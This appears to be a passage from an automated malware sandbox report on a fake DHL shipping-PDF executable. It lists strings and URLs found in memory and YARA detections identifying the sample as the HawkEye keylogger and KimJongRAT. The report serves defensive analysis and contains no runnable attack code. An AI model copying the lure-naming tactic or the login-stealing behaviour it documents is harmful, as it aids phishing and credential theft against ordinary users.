            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v19/KFOlCnqEu92Fr1MmEU9fBBc-.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v19/KFOlCnqEu92Fr1MmSU5fBBc-.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v19/KFOmCnqEu92Fr1Mu4mxM.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7064439419818173&output=html&h=250&twa=
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/adview?ai=C4ZZc-r8UXcilEM6E-gaA-YLQCODD_YZVtLCoh4gJ8ui0tf
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: vbc.exe, 0000000B.00000002.302227733.0000000000AB0000.00000004.00000040.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ht66
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20190624/r20190131/zrt_lookup.html
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wre
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1561640951&rver=7.0.6730.0&wp=l
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
            Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mcdp-chidc2.outbrain.com/l?token=c21d6fc334f1b2ec2cf4d2cbc4199764_4535_1561640954843
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mcdp-chidc2.outbrain.com/l?token=cadd7d1b12e34ff71b0237f3627e8ef3_4535_1561640955067
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mcdp-chidc2.outbrain.com/l?token=e2c41a910c7be90243b349629cd840b2_4535_1561640955327
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://p.rfihub.com/cm?in=1&pub=345&userid=3011883223893104794
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-7064439419818173.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://pki.goog/repository/0
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://pr-bh.ybp.yahoo.com/sync/msn/0D4108E9D28A6B29364F0561D37B6A29
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://secure.comodo.com/CPS0
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=9a5be529d6034927bda092231704a93b&c=MSN&d=http%3A%2F%2Fwww.msn
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://sync.outbrain.com/cookie-sync?p=medianet&uid=2046425540973639000V10
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/abg_lite.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/client/m_js_controller.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/client/qs_click_protection.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/client/window_focus.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/1034445299425550758?w=300&h=300
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://widgets.outbrain.com/
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://widgets.outbrain.com/widgetOBUserSync/obUserSync.html
            Source: vbc.exe, 0000000B.00000003.300248743.00000000021AB000.00000004.00000001.sdmpString found in binary or memory: https://widgets.outbrain.com/widgetOBUserSync/obUserSync.htmlhttp://s.amazon-adsystem.com/x/da2e6c89
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=892565928.1601478348
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/
            Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://www.google.com/pagead/drt/ui
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd_listener.js?cache=r20110914
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040F078 OpenClipboard,GetLastError,DeleteFileW,11_2_0040F078

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 24.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 24.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
